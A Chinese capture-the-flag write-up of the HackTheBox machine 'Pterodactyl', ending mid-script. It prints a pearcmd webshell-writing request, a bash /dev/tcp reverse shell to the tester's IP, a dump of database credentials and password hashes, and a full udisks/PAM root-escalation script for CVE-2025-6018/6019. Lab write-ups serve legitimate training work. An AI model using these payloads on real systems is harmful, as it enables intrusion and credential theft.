HackTheBox-Pterodactyl

このまま地平線を
就这样直接
追い越してやるんだ
超越地平线吧
最前線飛ばせ僕たちは
在最前线飞驰的我们
星もない夜
在星光黯淡的夜晚
ただ東を目指して行く
只是一味的奔向东方

靶机ip:10.129.252.208

难度:中等

涉及内容:

  • 信息收集 (Reconnaissance):
    • 端口扫描与服务枚举 (Nmap)
    • Web 子域名爆破 (Gobuster/VHost enumeration)
    • Web 目录扫描 (Dirsearch)
    • 开源软件版本指纹识别与漏洞检索 (Changelog 分析)
  • Web 漏洞利用 (Web Exploitation):
    • CVE-2025-49132: Pterodactyl Panel 信息泄露与利用
    • PHP-PEAR 利用: 利用 pearcmd 配合 config-create 进行本地文件包含/写入 (LFI to RCE)
  • 后渗透与横向移动 (Post-Exploitation & Lateral Movement):
    • 数据库枚举 (MySQL/MariaDB)
    • 哈希提取与离线破解 (John the Ripper - Bcrypt)
    • 凭据复用 (Credential Stuffing via SSH)
  • 权限提升 (Privilege Escalation):
    • 系统环境枚举 (LinPEAS/OS Release)
    • CVE-2025-6018: PAM 环境变量配置错误导致会话伪装
    • CVE-2025-6019: libblockdev/udisks 在 XFS Resize 操作中的不安全挂载漏洞

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# nmap -p- -Pn 10.129.252.208
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-08 19:52 -0500
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.39% done
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.56% done
Stats: 0:04:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 77.49% done; ETC: 19:59 (0:01:27 remaining)
Stats: 0:05:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 80.69% done; ETC: 19:59 (0:01:20 remaining)
Nmap scan report for 10.129.252.208
Host is up (0.11s latency).
Not shown: 65065 filtered tcp ports (no-response), 466 filtered tcp ports (admin-prohibited)
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
443/tcp  closed https
8080/tcp closed http-proxy

Nmap done: 1 IP address (1 host up) scanned in 457.46 seconds

访问80端口,提示重定向到pterodactyl.htb。

提示还有一个子域名play.pterodactyl.htb

那就顺便把子域名爆破也做了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://pterodactyl.htb/ --append-domain -t 25 | grep -v "301"
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       http://pterodactyl.htb/
[+] Method:                    GET
[+] Threads:                   25
[+] Wordlist:                  /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:                gobuster/3.8.2
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
panel.pterodactyl.htb Status: 200 [Size: 1897]
#www.pterodactyl.htb Status: 400 [Size: 157]
#mail.pterodactyl.htb Status: 400 [Size: 157]
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kaada
255.255.255.255 broadcasthost
::1 localhost


192.168.56.253 hellman.nyx
10.129.229.224 analytical.htb data.analytical.htb
10.129.252.208 pterodactyl.htb play.pterodactyl.htb panel.pterodactyl.htb

dirsearch扫一下目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# dirsearch -u http://pterodactyl.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/Pterodactyl/reports/http_pterodactyl.htb/__26-02-08_20-06-27.txt

Target: http://pterodactyl.htb/

[20:06:27] Starting:                                                                                                                                       
[20:06:34] 403 -  555B  - /.ht_wsr.txt                                      
[20:06:34] 403 -  555B  - /.htaccess.bak1                                   
[20:06:34] 403 -  555B  - /.htaccess.orig                                   
[20:06:34] 403 -  555B  - /.htaccess.sample
[20:06:34] 403 -  555B  - /.htaccess.save
[20:06:34] 403 -  555B  - /.htaccess_extra                                  
[20:06:34] 403 -  555B  - /.htaccess_orig                                   
[20:06:34] 403 -  555B  - /.htaccessBAK
[20:06:34] 403 -  555B  - /.htaccessOLD2
[20:06:34] 403 -  555B  - /.htaccessOLD
[20:06:34] 403 -  555B  - /.html
[20:06:34] 403 -  555B  - /.htaccess_sc
[20:06:34] 403 -  555B  - /.htm
[20:06:34] 403 -  555B  - /.htpasswd_test                                   
[20:06:34] 403 -  555B  - /.htpasswds
[20:06:34] 403 -  555B  - /.httr-oauth
[20:06:54] 200 -  920B  - /changelog.txt                                    
[20:07:18] 200 -   72KB - /phpinfo.php                                      
[20:07:20] 403 -  555B  - /Public/                                          
                                                                             
Task Completed

访问/changelog.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
MonitorLand - CHANGELOG.txt
======================================

Version 1.20.X

[Added] Main Website Deployment
--------------------------------
- Deployed the primary landing site for MonitorLand.
- Implemented homepage, and link for Minecraft server.
- Integrated site styling and dark-mode as primary.

[Linked] Subdomain Configuration
--------------------------------
- Added DNS and reverse proxy routing for play.pterodactyl.htb.
- Configured NGINX virtual host for subdomain forwarding.

[Installed] Pterodactyl Panel v1.11.10
--------------------------------------
- Installed Pterodactyl Panel.
- Configured environment:
  - PHP with required extensions.
  - MariaDB 11.8.3 backend.

[Enhanced] PHP Capabilities
-------------------------------------
- Enabled PHP-FPM for smoother website handling on all domains.
- Enabled PHP-PEAR for PHP package management.
- Added temporary PHP debugging via phpinfo()

其中有两个重要线索。

第一个是安装了Pterodactyl Panel v1.11.10,该版本存在CVE-2025-49132

CVE-2025-49132 — Pterodactyl Panel 未授权远程代码执行漏洞深度研究报告 - FreeBuf网络安全行业门户

第二个是php开启了PHP-PEAR,在phpinfo页面中可以更详细的展示到,这也为我们之后的rce埋下了伏笔。

提一下Pterodactyl Panel,这是一个开源的游戏服务器管理面板,可以用在泰拉瑞亚,minecraft等游戏中。

访问panel.pterodactyl.htb,发现是面板的登录界面。

既然之前已经发现了版本为 v1.11.10,那么可以利用网上现成的poc获取凭据。

63square/CVE-2025-49132: PoCs for CVE-2025-49132

0xtensho/CVE-2025-49132-poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl]
└─# cd CVE-2025-49132 
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# ls
dump-creds.py  exploit.py  LICENSE  README.md  test.py
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# python3 dump-creds.py http://panel.pterodactyl.htb           
/home/kali/Desktop/Pterodactyl/CVE-2025-49132/dump-creds.py:20: SyntaxWarning: invalid escape sequence '\/'
  expected = '{"..\/..\/config\/prologue":{"alerts":{"levels":["info","warning","danger","success"],"session_key":"alert_messages"}}}'
Target is vulnerable!
App key: base64{{UaThTPQnUjrrK61o}}+Luk7P9o4hM+gl4UiMJqcbTSThY=

-- Database config --
{'default': 'mysql', 'connections': {'mysql': {'driver': 'mysql', 'url': '', 'host': '127.0.0.1', 'port': '3306', 'database': 'panel', 'username': 'pterodactyl', 'password': 'PteraPanel', 'unix_socket': '', 'charset': 'utf8mb4', 'collation': 'utf8mb4_unicode_ci', 'prefix': '', 'prefix_indexes': '1', 'strict': '', 'timezone': '+00{{00}}', 'sslmode': 'prefer', 'options': {'1014': '1'}}}, 'migrations': 'migrations', 'redis': {'client': 'predis', 'options': {'cluster': 'redis', 'prefix': 'pterodactyl_database_'}, 'default': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '0', 'context': []}, 'sessions': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '1', 'context': []}}}

-- Filesystem config --
{'default': 'local', 'disks': {'local': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app', 'throw': ''}, 'public': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app/public', 'url': 'http://panel.pterodactyl.htb/storage', 'visibility': 'public', 'throw': ''}, 's3': {'driver': 's3', 'key': '', 'secret': '', 'region': '', 'bucket': '', 'url': '', 'endpoint': '', 'use_path_style_endpoint': '', 'throw': ''}}, 'links': {'/var/www/pterodactyl/public/storage': '/var/www/pterodactyl/storage/app/public'}}

-- Mail config --
{'default': 'smtp', 'mailers': {'smtp': {'transport': 'smtp', 'host': 'smtp.example.com', 'port': '25', 'encryption': 'tls', 'username': '', 'password': '', 'timeout': '', 'local_domain': 'panel.pterodactyl.htb'}, 'ses': {'transport': 'ses'}, 'mailgun': {'transport': 'mailgun'}, 'postmark': {'transport': 'postmark'}, 'sendmail': {'transport': 'sendmail', 'path': '/usr/sbin/sendmail -bs -i'}, 'log': {'transport': 'log', 'channel': ''}, 'array': {'transport': 'array'}, 'failover': {'transport': 'failover', 'mailers': ['smtp', 'log']}}, 'from': {'address': 'no-reply@example.com', 'name': 'Pterodactyl Panel'}, 'markdown': {'theme': 'default', 'paths': ['/var/www/pterodactyl/resources/views/vendor/mail']}}

我们获取到了一组mysql的登录凭据

1
pterodactyl:PteraPanel

另外,我们可以利用pearcmd配合config-create写webshell进去。

在利用 dump-creds.py 获取数据库凭据的同时,通过 PHPINFO 页面确认其开启了 register_argc_argv 选项。这为利用 PHP 的 PEAR 命令行工具 (pearcmd.php) 进行远程代码执行提供了条件。

此攻击利用了 PHP 在特定配置下处理 URL 查询字符串 (Query String) 的机制,结合本地文件包含 (LFI) 漏洞实现。

  • RFC 3875 (CGI 规范) 与参数注入: 根据 RFC 3875 Section 4.4,当 HTTP 请求的查询字符串(Query String)中不包含未编码的等号(=)时,CGI 接口会将查询字符串视作命令行参数传递给后端解释器。 在 URL 中,+ 号被解码为空格。因此,请求 ?+config-create+... 会被 PHP 解释器解析为命令行参数:config-create ...
  • 关键配置 register_argc_argv: PHP 配置文件 (php.ini) 中的 register_argc_argv = On 是此漏洞的先决条件。当开启时,PHP 会将接收到的查询字符串参数填充到全局变量 $argc (参数数量) 和 $argv (参数数组) 中。
  • 利用 pearcmd.php 写入文件: pearcmd.php 是 PEAR 包管理器的命令行入口。它默认存在于 Docker 容器的 /usr/local/lib/php/ 目录下。该脚本会读取 $argv 中的参数并执行相应操作。 我们利用 PEAR 的 config-create 指令,该指令原本用于创建配置文件,语法为: config-create <root_path> <filename> 通过构造恶意的 <root_path> 参数(包含 PHP 代码),我们可以强制 PEAR 将恶意代码写入到 Web 目录下的文件中。

这里需要注意,写马的路径为/var/www/pterodactyl/public,方便我们直接访问。

1
curl -g -s 'http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/<?=system($_GET[0]);?>+/var/www/pterodactyl/public/shell.php'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# # Test command execution
curl "http://panel.pterodactyl.htb/shell.php?0=id"

#PEAR_Config 0.9
a:12:{s:7:"php_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/php";s:8:"data_dir";s:33:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/data";s:7:"www_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/www";s:7:"cfg_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/cfg";s:7:"ext_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/ext";s:7:"doc_dir";s:33:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/docs";s:8:"test_dir";s:34:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/tests";s:9:"cache_dir";s:34:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/cache";s:12:"download_dir";s:37:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/download";s:8:"temp_dir";s:33:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/temp";s:7:"bin_dir";s:28:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear";s:7:"man_dir";s:32:"/uid=474(wwwrun) gid=477(www) groups=477(www)
uid=474(wwwrun) gid=477(www) groups=477(www)/pear/man";}

那么现在可以反弹shell了。

1
2
3
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# curl "http://panel.pterodactyl.htb/shell.php?0=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.11/4444+0>%261'"

1
2
3
4
5
6
7
8
9
────────────────────────────────────────────────────────────────────────────────
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from pterodactyl-10.129.252.208-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/pterodactyl~10.129.252.208_Linux_x86_64/2026_02_08-20_23_10-028.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
wwwrun@pterodactyl:/var/www/pterodactyl/public>

拿到shell后用我们刚刚获得的数据库凭据探测有效信息

1
mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
wwwrun@pterodactyl:/var/www/pterodactyl/public> mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 83
Server version: 11.8.3-MariaDB MariaDB package

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| panel              |
| test               |
+--------------------+
3 rows in set (0.026 sec)

MariaDB [(none)]> use panel;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [panel]> show tables;
+-----------------------+
| Tables_in_panel       |
+-----------------------+
| activity_log_subjects |
| activity_logs         |
| allocations           |
| api_keys              |
| api_logs              |
| audit_logs            |
| backups               |
| database_hosts        |
| databases             |
| egg_mount             |
| egg_variables         |
| eggs                  |
| failed_jobs           |
| jobs                  |
| locations             |
| migrations            |
| mount_node            |
| mount_server          |
| mounts                |
| nests                 |
| nodes                 |
| notifications         |
| password_resets       |
| recovery_tokens       |
| schedules             |
| server_transfers      |
| server_variables      |
| servers               |
| sessions              |
| settings              |
| subusers              |
| tasks                 |
| tasks_log             |
| user_ssh_keys         |
| users                 |
+-----------------------+
35 rows in set (0.001 sec)

1
2
3
4
5
6
7
8
9
10
MariaDB [panel]> select * from users;
+----+-------------+--------------------------------------+--------------+------------------------------+------------+-----------+--------------------------------------------------------------+--------------------------------------------------------------+----------+------------+----------+-------------+-----------------------+----------+---------------------+---------------------+
| id | external_id | uuid                                 | username     | email                        | name_first | name_last | password                                                     | remember_token                                               | language | root_admin | use_totp | totp_secret | totp_authenticated_at | gravatar | created_at          | updated_at          |
+----+-------------+--------------------------------------+--------------+------------------------------+------------+-----------+--------------------------------------------------------------+--------------------------------------------------------------+----------+------------+----------+-------------+-----------------------+----------+---------------------+---------------------+
|  2 | NULL        | 5e6d956e-7be9-41ec-8016-45e434de8420 | headmonitor  | headmonitor@pterodactyl.htb  | Head       | Monitor   | $2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2 | OL0dNy1nehBYdx9gQ5CT3SxDUQtDNrs02VnNesGOObatMGzKvTJAaO0B1zNU | en       |          1 |        0 | NULL        | NULL                  |        1 | 2025-09-16 17:15:41 | 2025-09-16 17:15:41 |
|  3 | NULL        | ac7ba5c2-6fd8-4600-aeb6-f15a3906982b | phileasfogg3 | phileasfogg3@pterodactyl.htb | Phileas    | Fogg      | $2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi | 6XGbHcVLLV9fyVwNkqoMHDqTQ2kQlnSvKimHtUDEFvo4SjurzlqoroUgXdn8 | en       |          0 |        0 | NULL        | NULL                  |        1 | 2025-09-16 19:44:19 | 2025-11-07 18:28:50 |
+----+-------------+--------------------------------------+--------------+------------------------------+------------+-----------+--------------------------------------------------------------+--------------------------------------------------------------+----------+------------+----------+-------------+-----------------------+----------+---------------------+---------------------+
2 rows in set (0.001 sec)

MariaDB [panel]>

拿到了两个用户名以及对应的哈希,准备破解。

1
2
headmonitor:$2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2
phileasfogg3:$2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi

其中用户phileasfogg3的哈希被成功破解

1
2
3
4
5
6
7
8
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-49132]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!QAZ2wsx         (phileasfogg3)

使用ssh尝试登录,成功登录到用户phileasfogg3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh phileasfogg3@10.129.252.208
The authenticity of host '10.129.252.208 (10.129.252.208)' can't be established.
ED25519 key fingerprint is: SHA256:FOOqnHbybkpXftYgyrorbBxkgW0L4yMSLYxG8F87SDE
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.252.208' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
(phileasfogg3@10.129.252.208) Password: 
(phileasfogg3@10.129.252.208) Password: 
Have a lot of fun...
Last login: Mon Feb 9 03:32:30 2026 from 10.10.14.11
phileasfogg3@pterodactyl:~> ls
bin  user.txt
phileasfogg3@pterodactyl:~>

上传linpeas准备枚举可用提权文件。

经过分析,该系统为

1
OS: Linux version 6.4.0-150600.23.65-default (geeko@buildhost) (gcc (SUSE Linux) 7.5.0, GNU ld (GNU Binutils; SUSE Linux Enterprise 15) 2.43.1.20241209-150100.7.52) #1 SMP PREEMPT_DYNAMIC Tue Aug 12 00:37:41 UTC 2025 (aedcb04)

可用CVE-2025-6018 & CVE-2025-6019组合提权

Linux本地提权漏洞利用链 (CVE-2025-6018、CVE-2025-6019) 安全风险通告 - 安全内参 | 决策者的网络安全知识库

双漏洞链一击拿下Root:CVE-2025-6018/CVE-2025-6019 横扫主流Linux - FreeBuf网络安全行业门户

漏洞链概览 (Privilege Escalation Chain)

攻击者利用 openSUSE 特有的两个漏洞组合,从普通 SSH 用户权限提升至 Root 权限。

1. CVE-2025-6018:PAM 配置错误 (权限伪装)

  • 原理: openSUSE 的 PAM(可插拔认证模块)配置存在缺陷,允许通过 SSH 登录的用户利用 ~/.pam_environment 文件设置特定的环境变量。
  • 利用方式: 攻击者通过注入环境变量,欺骗 PolicyKit(polkit)权限管理系统,使其通过 allow_active 策略检查。
  • 核心影响将远程会话伪装成本地会话。通常 allow_active 权限仅保留给物理登录(坐在显示器前)的用户。一旦绕过此限制,SSH 用户就能执行通常被禁止的高权限 D-Bus 操作(例如挂载磁盘或管理系统服务)。

2. CVE-2025-6019:libblockdev/udisks 不安全挂载 (执行提权)

  • 原理udisks 服务在处理 XFS 文件系统的大小调整(resize) 操作时存在逻辑漏洞。当系统为了调整大小而临时挂载文件系统时,未强制添加 nosuid 挂载选项。
  • 利用方式
    1. 攻击者创建一个包含 SUID Root Shell(如设置了 SUID 位的 /bin/bash 副本)的恶意 XFS 文件系统镜像。
    2. 利用 CVE-2025-6018 获取的 PolicyKit 权限,触发 udisks 对该镜像进行 “Resize” 操作。
    3. 系统将该镜像挂载(且未禁用 SUID)。
  • 核心影响允许 SUID 提权。攻击者可以直接运行镜像中预埋的 SUID 二进制文件,从而获得 Root Shell。

攻击链逻辑总结

  1. 突破访问控制 (CVE-2025-6018):通过 PAM 漏洞,让 SSH 远程用户获得类似“本地物理用户”的 PolicyKit 权限,从而有权调用 udisks 服务。
  2. 执行提权负载 (CVE-2025-6019):利用 udisks 在处理 XFS Resize 时未禁用 SUID 的漏洞,挂载恶意磁盘并运行其中的 SUID 程序,最终拿到 Root 权限。

首先进行提权前的准备。创建pam环境文件并将allow_active设置为yes

1
2
3
4
cat > ~/.pam_environment << 'EOF'
XDG_SEAT=seat0
XDG_VTNR=1
EOF

退出ssh重进以启动设置

1
2
3
4
5
Active=yesphileasfogg3@pterodactyl:~> loginctl show-session $(loginctl | grep $(whoami) | awk '{print $1}') | grep -E "Seat|Active"
Active=yes
Seat=seat0
Active=yes

第一步:身份伪装 (CVE-2025-6018)

核心问题:PAM 配置允许不可信的环境变量注入。

  1. 背景: 在 Linux 中,polkit (PolicyKit) 用于细粒度的权限控制。许多高权限操作(如挂载磁盘)默认只允许 Active(活跃)Local(本地) 的会话执行。SSH 远程登录通常被视为 “Inactive” 或 “Remote”,因此无权调用 udisks 的某些 D-Bus 接口。

  2. 漏洞原理: openSUSE 的 PAM 配置错误地允许用户通过 ~/.pam_environment 文件设置关键的环境变量 。

  3. 攻击实施:

    • 攻击者在 phileasfogg3 的家目录写入配置 :

      Bash

      1
      2
      XDG_SEAT=seat0   # 伪装成物理终端座位
      XDG_VTNR=1       # 伪装虚拟终端号

    • 效果: 重新登录 SSH 后,systemd-logind 读取这些变量,错误地将当前的远程 SSH 会话判定为 “Seat=seat0”“Active=yes”

    • 结果: 攻击者绕过了 polkit 的限制,现在有权限调用系统级的 D-Bus 消息,包括 udisks2

下载网上的公开poc

guinea-offensive-security/CVE-2025-6019

选择本地模式编译恶意镜像

记得要先下载缺失的包

1
sudo apt install xfsprogs -y
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-6019-main]
└─# bash exploit.sh
PoC for CVE-2025-6019 (LPE via libblockdev/udisks)
WARNING: Only run this on authorized systems. Unauthorized use is illegal.
Continue? [y/N]: y
[+] All dependencies are installed.
[*] Checking for vulnerable libblockdev/udisks versions...
[*] Detected udisks version: unknown
[!] Warning: Specific vulnerable versions for CVE-2025-6019 are unknown.
[!] Verify manually that the target system runs a vulnerable version of libblockdev/udisks.
[!] Continuing with PoC execution...
Select mode:
[L]ocal: Create 300 MB XFS image (requires root)
[C]ible: Exploit target system
[L]ocal or [C]ible? (L/C): l
[*] Creating a 300 MB XFS image on local machine...
300+0 records in
300+0 records out
314572800 bytes (315 MB, 300 MiB) copied, 0.279727 s, 1.1 GB/s
meta-data=./xfs.image            isize=512    agcount=4, agsize=19200 blks
         =                       sectsz=512   attr=2, projid32bit=1
         =                       crc=1        finobt=1, sparse=1, rmapbt=1
         =                       reflink=1    bigtime=1 inobtcount=1 nrext64=1
         =                       exchange=0   metadir=0
data     =                       bsize=4096   blocks=76800, imaxpct=25
         =                       sunit=0      swidth=0 blks
naming   =version 2              bsize=4096   ascii-ci=0, ftype=1, parent=0
log      =internal log           bsize=4096   blocks=16384, version=2
         =                       sectsz=512   sunit=0 blks, lazy-count=1
realtime =none                   extsz=4096   blocks=0, rtextents=0
         =                       rgcount=0    rgsize=0 extents
         =                       zoned=0      start=0 reserved=0
[+] 300 MB XFS image created: ./xfs.image
[*] Transfer to target with: scp xfs.image <user>@<host>:

将镜像上传到受害机。

如果嫌上传速度太慢可以先打包成zip再上传。

1
2
3
4
5
┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-6019-main]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.252.208 - - [08/Feb/2026 20:52:04] "GET /xfs.image HTTP/1.1" 200 -

上传花了有快一个小时,还好是复盘性质的wp。实战要是边打边写那真抓瞎了。

第二步:执行提权 (CVE-2025-6019)

核心问题:UDisks 在 XFS Resize 操作中未禁用 SUID。

  1. 背景: nosuid 挂载选项用于防止挂载的文件系统中的 setuid 二进制文件以其所有者权限执行。通常,非特权用户挂载磁盘时,系统会强制加上 nosuid
  2. 漏洞原理: libblockdevudisks 在处理 XFS 文件系统扩容 (Resize) 请求时存在逻辑漏洞。为了调整文件系统大小,服务需要临时挂载该设备。但在执行此挂载时,未强制添加 nosuid 参数
  3. 攻击实施:
    • 准备: 攻击者在本地制作了一个恶意的 XFS 镜像文件 (xfs.image) ,并在其中放置了恶意的 SUID 程序(或者如 WP 脚本所示,准备好环境等待挂载)。
    • 触发: 攻击者通过 D-Bus 向 UDisks2 发送 Filesystem.Resize 指令 。由于 CVE-2025-6018 已通过,此请求被许可。
    • 竞态条件 (Race Condition): 系统会临时挂载该镜像(带 SUID 权限)。WP 中的脚本利用这个短暂的窗口,运行镜像内的恶意程序或利用挂载点,执行 chmod u+s /bin/bash

上传完使用脚本提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/bin/bash

# 1. 环境清理
killall -KILL gvfs-udisks2-volume-monitor 2>/dev/null

echo "[*] Setting up loop device..."
# 确保使用绝对路径
IMAGE_PATH="$(pwd)/xfs.image"
OUTPUT=$(udisksctl loop-setup --file $IMAGE_PATH --no-user-interaction)
LOOP_DEV=$(echo $OUTPUT | awk '{print $NF}' | tr -d '.')

if [ -z "$LOOP_DEV" ]; then
    echo "[-] Failed to setup loop device."
    exit 1
fi

LOOP_NAME=$(basename $LOOP_DEV)
echo "[+] Loop device created: $LOOP_DEV"

# 2. 启动提权抢占循环
# 目标:利用临时挂载点的 root 权限,给系统的 /bin/bash 加上 SUID 位
echo "[*] Starting race loop to chmod /bin/bash..."

(
    while true; do
        # 核心 Payload 修改:
        # 使用 -c 执行 chmod 命令
        # 2>/dev/null 屏蔽报错,静默尝试
        /tmp/blockdev*/bash -p -c "chmod u+s /bin/bash" 2>/dev/null
        
        # 检查 /bin/bash 是否已经有 SUID 位 (-u 参数)
        # 如果成功了,就退出循环
        if [ -u /bin/bash ]; then
            break
        fi
    done
) &
PID=$!

# 给后台进程一点启动时间
sleep 0.5

# 3. 触发漏洞
echo "[*] Triggering Filesystem.Resize..."
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path /org/freedesktop/UDisks2/block_devices/$LOOP_NAME \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}' >/dev/null 2>&1

# 4. 验证并进入 Shell
sleep 1
# 停止后台循环
kill $PID 2>/dev/null

echo "[*] Checking permissions..."
if [ -u /bin/bash ]; then
    echo ""
    echo "[+] SUCCESS! /bin/bash is now SUID."
    ls -l /bin/bash
    
    echo "[+] Spawning persistent root shell..."
    # 以后只需要运行这一行命令即可获得 root
    /bin/bash -p
else
    echo "[-] Failed to set SUID bit. Try running the script again."
    # 失败时清理 loop 设备,方便重试
